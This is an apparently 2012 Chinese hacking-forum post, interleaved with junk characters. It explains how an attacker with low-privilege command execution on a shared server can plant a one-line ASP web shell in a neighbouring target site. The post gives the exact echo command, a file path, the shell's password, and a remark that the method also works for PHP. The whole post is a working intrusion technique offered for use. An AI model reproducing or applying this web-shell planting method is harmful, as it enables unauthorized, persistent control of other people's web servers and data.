在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
% {9 K3 Q7 n- d; ?9 v" F* f
; o3 y+ y, l7 k+ N# V, ^6 f# S命令格式+ K, a1 M- j8 ^7 }
$ V7 t" X4 n$ F1 w( FEcho 语句 >目标站绝对目录
8 d+ d, w) E2 C8 }5 v7 ~6 h6 {7 `4 o5 m2 Q" J; W
例如:
, r9 n- z2 S+ L/ T2 S- T3 P
! F, a! @8 I7 H/ |2 M9 v; G( T! ?echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
2 D y; l& _3 ~& V9 L
1 t6 M" C5 |; F2 j& ~" |* p5 j6 ~这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。; n8 {. U2 D y. f; y: Z: \
|
发表于 2012-9-23 14:40:24
收藏
支持
反对